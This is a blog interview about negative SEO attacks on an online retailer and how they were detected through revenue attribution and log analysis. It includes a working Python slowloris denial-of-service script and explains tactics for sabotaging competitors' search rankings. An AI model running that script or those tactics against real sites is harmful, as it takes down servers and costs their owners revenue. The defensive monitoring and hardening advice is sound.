During our Clarity World Tour event in Seattle, I had the privilege of talking with Ted Kubaitis from GreaterGood.com. Of the many great conversations I've had around the world, this one stood out the most. Ted taught me a lot about negative SEO attacks and how to detect them that I'd never even considered before.
What is Negative SEO?
Negative SEO is a strategy employed by sites to hurt their competitors by influencing search engine signals to or from those competitors' sites. When most SEOs think about Negative SEO, they generally only consider the buying of bad backlinks to competitor sites. That's what I thought for years. But apparently, Negative SEO draws on a much more diverse skill set, with many other tactics that can be even more insidious than buying bad links.
That's why I had to follow up on my conversation with Ted and sit at his feet a while to learn what he has learned.
The Interview
KG: First of all, thank you so much for your willingness to share what you've learned with us today.
TK: You are very welcome.
KG: Are you an SEO by trade?
TK: It is part of what I do. Today it is probably 20% of my day. I am currently the Director of Business Intelligence for a large online retailer. I am both a software engineer and marketer. In the past, I have patented a technology and founded a software company in the area of competitive and business intelligence. I have worn just about every hat there is to wear in an online business.
KG: For the Googlers who deny the influence of Negative SEO, is Negative SEO real, and does it impact sites?
TK: It's real. I think the deniers suffer from sample bias: because they haven't been targeted themselves, they assume the threat must be minimal. But the truth is that it's an arms race. There is a lot of money on the line, many competitors sit outside your legal jurisdiction, and in many cases there aren't even laws that apply to these kinds of attacks, so it can become very serious very fast.
KG: How did you detect the first negative SEO attack on your site?
TK: I first encountered negative SEO by accident of course! I used to be in the "negative SEO isn't real" camp. I sit in the engineering bullpen at my company, which is all open-air. There are no offices or cubes on this team. This allows everyone to be aware of all of the issues of the day automatically. I overheard the network administrator battling with very weak denial of service attacks on our servers.
### GEEK SPEAK – TECHNICAL DETAILS WARNING – optionally skip to below ###
The specific type of attack my network administrator was battling is called a "slow loris" attack.
Slow Loris Defined
Slowloris is a piece of software written by Robert "RSnake" Hansen which allows a single machine to take down another machine's web server with minimal bandwidth and side effects on unrelated services and ports.
Slowloris tries to keep many connections to the target web server open and hold them open as long as possible. It accomplishes this by opening connections to the target web server and sending a partial request. Periodically, it will send subsequent HTTP headers, adding to—but never completing—the request. Affected servers will keep these connections open, filling their maximum concurrent connection pool, eventually denying additional connection attempts from clients.
Source: Wikipedia
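To make the mechanism concrete, here is a minimal Python sketch of the partial-request behavior described above, intended only for load-testing a server you own. The host, port, and connection counts are illustrative assumptions, not details from Ted's incident.

```python
# Minimal sketch of the slow loris mechanism: open many connections, send an
# incomplete HTTP request on each, and keep them alive with header fragments.
# Only point this at a test server you own. All values below are assumptions.
import socket
import time

TARGET_HOST = "localhost"   # your own test server
TARGET_PORT = 80
NUM_CONNECTIONS = 200       # enough to fill a small connection pool
KEEPALIVE_INTERVAL = 10     # seconds between partial header fragments

def open_partial_connection():
    """Open a socket and send an HTTP request that is never completed."""
    s = socket.create_connection((TARGET_HOST, TARGET_PORT), timeout=5)
    # Request line plus one header, but never the terminating blank line,
    # so the server holds the connection open waiting for the rest.
    s.send(b"GET / HTTP/1.1\r\nHost: " + TARGET_HOST.encode() + b"\r\n")
    return s

sockets = []
for _ in range(NUM_CONNECTIONS):
    try:
        sockets.append(open_partial_connection())
    except OSError:
        break  # the server stopped accepting connections: its pool is exhausted

while sockets:
    time.sleep(KEEPALIVE_INTERVAL)
    for s in list(sockets):
        try:
            s.send(b"X-a: b\r\n")  # another bogus header, never a complete request
        except OSError:
            sockets.remove(s)      # the server gave up on this connection
```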
### END GEEK SPEAK ###
The attacks made little sense. We would detect them and block them usually within an hour or two, and they would keep coming back every two to three weeks. This went on for months and possibly even years. We're not sure when they started.
We didn't understand the motivation behind these attacks. We could easily counter them once they were detected. Why was someone working so persistently over time to do this when we thwarted it so quickly every time it happened?
Months went by. I was in an executive meeting trying to explain the bizarre volatility in SEO revenue. Keep in mind I didn't believe in negative SEO at this point. In that meeting I got chills. I had a notion I just couldn't shake. After the meeting, I put the graph of the slow loris attacks on top of the graph of SEO revenue, and every large drop in SEO revenue ALWAYS followed a slow loris attack. From that day forward I knew negative SEO was very real and very different from what I and everyone else thought negative SEO was. This was a VERY effective negative SEO attack and it had absolutely nothing to do with backlinks.
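The overlay Ted describes is straightforward to reproduce if you keep a record of incidents. Here is a minimal sketch, assuming hypothetical CSV files of daily SEO revenue and recorded attack dates; the file names and columns are mine, not Ted's.

```python
# Sketch: plot daily SEO revenue with known attack dates overlaid as vertical lines.
# "seo_revenue.csv" (date, revenue) and "attacks.csv" (date) are hypothetical files.
import pandas as pd
import matplotlib.pyplot as plt

revenue = pd.read_csv("seo_revenue.csv", parse_dates=["date"])
attacks = pd.read_csv("attacks.csv", parse_dates=["date"])

fig, ax = plt.subplots(figsize=(12, 4))
ax.plot(revenue["date"], revenue["revenue"], label="SEO revenue")
for attack_date in attacks["date"]:
    ax.axvline(attack_date, color="red", linestyle="--", alpha=0.7)

ax.set_title("Daily SEO revenue vs. slow loris attack dates")
ax.set_ylabel("Revenue")
ax.legend()
plt.tight_layout()
plt.show()
```

If every large revenue drop trails one of the vertical lines, you are seeing the same pattern Ted saw.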
### GEEK SPEAK ###
I spent the next several weeks learning everything I could about this negative SEO attack. I learned how it worked. In a nutshell, our attacker would wait for an indication that Googlebot was crawling our site, then launch the attack so our web server would return 500 errors to everyone, including Googlebot. Googlebot, at the time, would remove the pages that returned an error response from the search results and wouldn't retest them for days. (This isn't the case today... Google retests within hours now, but it was the case at the time.) Then, to make things even worse, once Googlebot found that the pages were working again, they would reappear several places lower in the search results and stay there for about two weeks before recovering to their original rankings.
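One way to spot this pattern after the fact is to scan your access logs for 5xx responses served to Googlebot. Here is a minimal sketch that assumes a combined-format Apache/Nginx log; the file path and regular expression are assumptions about your setup.

```python
# Sketch: count 5xx responses served to Googlebot, per day, from a combined-format log.
import re
from collections import Counter
from datetime import datetime

# Example line: 1.2.3.4 - - [10/Oct/2014:13:55:36 -0700] "GET /x HTTP/1.1" 500 1234 "-" "Googlebot/2.1"
LINE_RE = re.compile(r'\[(\d{2}/\w{3}/\d{4}):[^\]]*\] "[^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"')

errors_by_day = Counter()
with open("access.log") as log_file:          # path is an assumption
    for line in log_file:
        match = LINE_RE.search(line)
        if not match:
            continue
        day, status, user_agent = match.groups()
        if status.startswith("5") and "Googlebot" in user_agent:
            errors_by_day[day] += 1

for day in sorted(errors_by_day, key=lambda d: datetime.strptime(d, "%d/%b/%Y")):
    print(day, errors_by_day[day])
```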
### END GEEK SPEAK ###
These attacks that we thought were unsuccessful and feeble were totally the opposite. They were successful and devastating. They had lasting effects and the timing of the attacks was keeping us pinned down.
"From that day forward I knew negative SEO was very real and very different from what I and everyone else thought negative SEO was. This was a VERY effective negative SEO attack and it had absolutely nothing to do with backlinks."
If you were just watching rankings, the effects looked like the normal, everyday Google dance. No one cares that one week a page goes down two spots and then comes back up a week or two later. We have 400K pages across 20 websites, and most of those websites shared servers. Webmaster Tools doesn't let you see aggregate effects across sites. If I hadn't been attributing and tracking SEO revenue across all sites, which many SEOs object to, this would have continued undetected.
So now we knew the attacks were real, and we knew how they worked. So how would we stop them?
For the attack to be effective, the attacker needed to time it to coincide with Googlebot's crawl of the website. How could they do that? There are four ways I can think of:
- Monitor the Google cache: when a cache date is updated, you know Googlebot is crawling.
- Analyze the cache dates and estimate when Googlebot will come back.
- Use cross-site scripting to see visiting user agents.
- Attack often and hope for the best.
I believed our attacker was clever, and they were probably doing #1.
I countered our attacker by putting a NOARCHIVE tag on all of our pages. This prevents Google from showing the Cached link for a page. This would stop the attacker from easily monitoring our cache dates.
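If you adopt the same countermeasure, it is worth verifying that every template actually serves the directive. Below is a minimal sketch that checks a few URLs for a noarchive robots meta tag or X-Robots-Tag header; the URL list and the crude regex are placeholders, not Ted's code.

```python
# Sketch: verify pages declare "noarchive" via a robots meta tag or an X-Robots-Tag header.
import re
import urllib.request

URLS_TO_CHECK = [                      # placeholder URLs; use your own key pages
    "https://www.example.com/",
    "https://www.example.com/some-category/",
]

META_NOARCHIVE = re.compile(r'<meta[^>]+noarchive', re.IGNORECASE)  # crude; a real HTML parser is safer

for url in URLS_TO_CHECK:
    with urllib.request.urlopen(url) as response:
        header = response.headers.get("X-Robots-Tag", "")
        html = response.read().decode("utf-8", errors="replace")
    protected = bool(META_NOARCHIVE.search(html)) or "noarchive" in header.lower()
    print(url, "OK" if protected else "MISSING noarchive")
```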
The attacks stopped for about 4 months following that change. We thought we had won, but we were wrong.
In late Q3 2014, we were hit hard by a single, extremely precise attack. Then our attacker went dormant. The attacker had their capability back, and they knew we were on to them. We knew they were picking their timing more carefully and more strategically. It was the second time something in SEO had given me chills. I had a notion I couldn't shake. Like most online retailers, we do most of our sales in Q4. The notion I couldn't shake was that the attacker was lying in wait for Black Friday. One of these attacks the week before Black Friday would destroy our top SEO weeks of the year.
We scrambled to figure out how they were timing their attacks. We failed. The week before Black Friday we were hit harder than we had ever been hit before. We lost 60-70% of our SEO revenue for the month. I was devastated.
The company officially accepted that the attacks were amounting to significant losses and were going to continue. We invested several hundred thousand dollars in security appliances that automatically detect and block hundreds of different attacks in real time.
"Following each and every soul-crushing SEO revenue event. I had to pour through the logs and testimony of everything to try and make sense of things."
It took six months to get all the websites protected by the new firewalls and to get all the URLs properly remapped. We had finally won a battle but at a pretty hefty price in time and money. I am very happy to say that this year we have seen high double-digit growth in SEO revenue. It is largely due to stopping the negative SEO attacks.
KG: What are some of the tactics you've seen used for Negative SEO that most people haven't heard of or would never even consider?
TK: The attack I just described I call a "Googlebot Interruption Attack". Negative SEO is so new that these attacks probably don't have official names yet.
Another attack is when a black hat takes a toxic domain name that has been penalized into the ground and then points the DNS to your website. Some of those penalties appear to carry over at least for a short while. The worst is when the attacker has a lot of these toxic domains and points them all at once at your website.
A similar attack to that is when they redirect the URLs from the toxic sites to your URLs. This has the effect of giving a website a whole collection of toxic backlinks in a way where the URLs still work. What is scary about this is the attack can recycle the investment in toxic links and change targets quickly.
Another attack is to target a page that is missing a canonical tag by submitting a version of the URL that works but Google has never seen, like adding a bogus URL parameter or anchor text. Then you link build to the bogus URL until it outranks the original. The original will fall out of the results as a lower PR duplicate. Then you pull the backlinks to the bogus URL, and you have effectively taken a page out of the Google index until they recalculate PR again. Just put a canonical tag on every page and you can protect yourself from this one.
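A quick way to confirm you are protected against this one is to request a page with a bogus parameter and check that it still declares the clean URL as canonical. A minimal sketch; the URL, parameter, and regex are hypothetical, and the pattern assumes rel appears before href in the tag.

```python
# Sketch: append a bogus parameter and verify the page still points its canonical
# tag back at the clean version of the URL.
import re
import urllib.request

CLEAN_URL = "https://www.example.com/product/123"   # hypothetical page
BOGUS_URL = CLEAN_URL + "?utm_bogus=negative-seo"    # a parameter Google has never seen

# Crude pattern; assumes rel="canonical" appears before href. A real HTML parser is safer.
CANONICAL_RE = re.compile(r'<link[^>]+rel="canonical"[^>]+href="([^"]+)"', re.IGNORECASE)

with urllib.request.urlopen(BOGUS_URL) as response:
    html = response.read().decode("utf-8", errors="replace")

match = CANONICAL_RE.search(html)
if match and match.group(1).rstrip("/") == CLEAN_URL.rstrip("/"):
    print("Protected: canonical points back at the clean URL.")
else:
    print("Exposed: no canonical tag, or it points somewhere unexpected.")
```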
Another attack just requires a lot of domains (they don't have to be toxic) that are indexed and visited by a LOT of bots. The attacker in many cases will point hundreds of these domains at a single website and use the collective bot activity as a denial of service against the website.
"Your only hope is to accurately attribute SEO revenue and monitor it regularly."
Everyone knows about buying spammy backlinks. I'm certain there are more attack vectors. It is limited only by the creativity of the bad guys, and bad guys can be pretty creative. Honestly, I'm scared to keep looking. It takes a serious SEO revenue event for me to muster up and dig into this dark pit. I am constantly afraid of what I might find next, having run the gauntlet and paid the price already.
KG: Where do you generally discover the indicators for these attacks? What should SEOs be looking for?
TK: A thousand SEOs are going to argue with me. Your only hope is to accurately attribute SEO revenue and monitor it regularly. Conversions are good, but if you're looking for a strong signal on the health of your SEO, revenue is better. Revenue implies good indexation, rankings, traffic, and conversions all in one very sensitive gauge. Conversions move the needle less, which makes the signals harder to see.
Secondly... sit next to your engineers. The issues they encounter are directly relevant to the effectiveness of your SEO. The frantic firefighting of the network administrator is one of the best indicators. Log serious events and plot them with revenue and other KPIs.
Third... logs. The crawl error logs in GWT tell you about the issues Googlebot encounters:
- Lots of 500 errors might be a Googlebot interruption attack.
- Lots of 404 errors might be toxic domain redirection.
- Lots of error URLs or duplicate content that make no sense for your website are also red flags.
- In general, hacking attempts often appear in web logs.
KG: How did you learn about how to detect these attacks?
TK: The hard way. Following each and every soul-crushing SEO revenue event, I had to pore through the logs and testimony of everything to try and make sense of things. Not every SEO event was an attack. In many cases the events were caused by errors deployed on our websites, or the marketing team installed a new, problematic tracking pixel service. Several times the owners bought domains and pointed them at our sites, not knowing that the previous owners had made them permanently toxic. As an SEO, you need to detect and address these as well. Revenue, logs, and a general awareness of daily events were critical to early detection.
KG: Would you suggest that SEOs spend more time on the blackhat forums as part of their continuing education?
TK: Yes and no. If you need help understanding an attack, then yes. If you are trusting of strangers in general, then you should stay away, as these forums often exploit the trusting. However, when I went to the reader base of many popular SEO forums and blogs, I was ridiculed and called a liar for asking for help with a problem most SEOs had never seen or heard of before. It was all too common for the peanut gallery of SEO professionals to criticize me for not having links and keep saying I had the burden of proof. These were supposedly members of the professional SEO community, but it was just a political flame war. The black hat community actually helped me research the kinds of attacks I was facing, explained how they worked, and suggested ideas for countering them. Google and the SEO community in general were very unsupportive. I'm going to remember that for a very long time.
"Google has a fundamental problem. Penalties are easily weaponized. If Google was rewarding the good then we’d want people to exploit that."
KG: How pervasive would you say these attacks are? How many attacks has your site experienced?
TK: For some reason we are a big target. It is probably because so many of our products compete with similar products that are often affiliate offerings. If you are an online retailer that does a lot of sales seasonally, you need to be on the lookout. The big threat is solved for my sites for now, but the vast majority of retail sites are unprotected, and many of them aren't in a position to solve the issue the way we did.
Over the years I'd say we've been attacked hundreds of times but it wasn't until 2014 that we became aware of it, and there were a lot of random events that helped that happen. There is "security by obscurity" for most websites. You have to be a worthy enough target to get this kind of attention.
KG: How do you approach Negative SEO mitigation? For example, how would you mitigate the use of false parameters on your site?
TK: Detection is paramount. You can't mitigate problems if you are unaware of them. For false parameters specifically, there are several options... you can use canonical tags on every page, which I highly recommend. You can also use URL rewriting to enforce very strict URL formatting. But if you aren't looking at the logs and at your search result URLs closely, then you won't even know about the issue.
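As one illustration of the strict-URL-formatting idea, here is a minimal sketch of a query-parameter whitelist: anything not on the list is stripped, and the application can 301-redirect to the cleaned URL. The parameter names and helper are assumptions, not Ted's implementation.

```python
# Sketch: keep only whitelisted query parameters and report whether the request
# should be redirected to the cleaned URL (e.g., with a 301).
from urllib.parse import urlsplit, urlunsplit, parse_qsl, urlencode

ALLOWED_PARAMS = {"page", "sort", "color"}   # hypothetical whitelist

def canonicalize(url: str):
    """Return (clean_url, needs_redirect) for a requested URL."""
    parts = urlsplit(url)
    params = parse_qsl(parts.query, keep_blank_values=True)
    kept = [(key, value) for key, value in params if key in ALLOWED_PARAMS]
    clean = urlunsplit((parts.scheme, parts.netloc, parts.path, urlencode(kept), ""))
    return clean, kept != params or bool(parts.fragment)

# A bogus parameter added by an attacker is stripped before it can create a
# duplicate, indexable URL.
print(canonicalize("https://www.example.com/product/123?sort=price&utm_bogus=x"))
# -> ('https://www.example.com/product/123?sort=price', True)
```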
KG: What types of negative SEO detection should platforms be doing that they aren't?
TK: Detailed revenue attribution is the big one. Seeing that the losses only come from Google is an important signal. For me, SEO revenue comes from dozens of sources: search engines like Google, Bing, Excite, AOL, and Yahoo; syndicated search, like laptop and ISP start pages and meta search engines; safe search products like AVG and McAfee; and finally my SEO experiments.
Having the revenue attribution lets me know that the revenue loss occurred only on Google this time, so it can't be consumer behavior like spring break; if consumers had simply gone on holiday, the drop would have been across the board.
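That comparison is easy to automate once revenue is tagged by source. A minimal sketch, assuming a hypothetical CSV of daily revenue rows tagged with their search source; the file name, columns, and thresholds are mine, not Ted's.

```python
# Sketch: pivot daily revenue by source and flag days where Google drops sharply
# while the other sources hold roughly steady.
import pandas as pd

df = pd.read_csv("attributed_revenue.csv", parse_dates=["date"])  # columns: date, source, revenue
pivot = df.pivot_table(index="date", columns="source", values="revenue", aggfunc="sum")

google = pivot["Google"]
others = pivot.drop(columns="Google").sum(axis=1)

# Compare each day to its trailing 28-day average.
google_ratio = google / google.rolling(28, min_periods=7).mean()
others_ratio = others / others.rolling(28, min_periods=7).mean()

# Flag days where Google is down 30%+ but everything else looks normal.
suspicious = pivot[(google_ratio < 0.7) & (others_ratio > 0.9)]
print(suspicious)
```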
Also keep an eye on 500 errors, 404 errors, and mystifying URLs in logs or in search results.
If you can invent one, a "Network Administrator Frustration Meter" would also be high on my list.
KG: Do you think machine learning will eventually negate manual algorithmic manipulation? Or will we always have to be vigilant?
TK: Google has a fundamental problem. Penalties are easily weaponized. If Google rewarded the good, then we'd want people to exploit that. Sure: win more accredited awards, get more accredited press, be publicly traded, or better yet have a favorable P/E ratio, and be in good standing with your lenders, customers, and suppliers... Go ahead and game that system if you can.
Unfortunately, Google would rather play whack-a-mole with bad sites. I don't know why. It seems contrary to being a good community member, in my opinion.
In terms of machine learning... It's an arms race. Many of us already employ systems or processes of making our sites respond to what works well in Google. I'd expect the arms race to continue.
" If something is not right, you need to be very proactive and diligent about trying to find the source, and don’t let naysayers stop you from finding out what is going on."
KG: Any last bit of advice for SEOs?
TK: Change a little. Measure a lot. You can prove it for yourself, so why aren't you doing that? The only results that count are the reproducible kind. If you are afraid to track SEO revenue because it won't justify your cost, then have the discussion about the value of direction-setting so that one day it will. SEO is a vector, meaning it has a magnitude and a direction. As far as tomorrow is concerned, the direction is more important. Go Seahawks!
TL;DR Summary
Success for a negative SEO attack is not an instant, catastrophic event; such an event would be easily detected and addressed. Rather, success for the blackhat SEO in this endeavor means opening many small holes: little trickles of rank loss, lost traffic, and lost revenue that are not easily detected by normal means. From slow loris attacks to falsified parameters and, yes, to buying bad links, the blackhat SEO has more than one tool in their toolbox, so sites should have more than one approach to measuring SEO success and monitoring for site issues. In this interview Ted Kubaitis outlined his struggles against negative SEO attacks, how he mitigated them, and how he monitors for them now.
Kubaitis recommends:
- Develop a close relationship with your sys admins and network administrators, and monitor their challenges to look for potential attacks
- Review your crawl error logs as well as your server log files for any anomalous patterns
- Monitor analytics to look for any non-standard parameters receiving traffic
- Use canonical tags and have your site enforce strict URL rules to avoid having extraneous pages created by would-be blackhats
- Do your research when something doesn't make sense
Ted Kubaitis: Currently the Director of Business Intelligence for GreaterGood.com. Ted is both an engineer and a marketer whose web experience goes back to when using NCSA Mosaic required a signed NDA. In the past Ted has patented a technology and founded a software company in the area of competitive and business intelligence.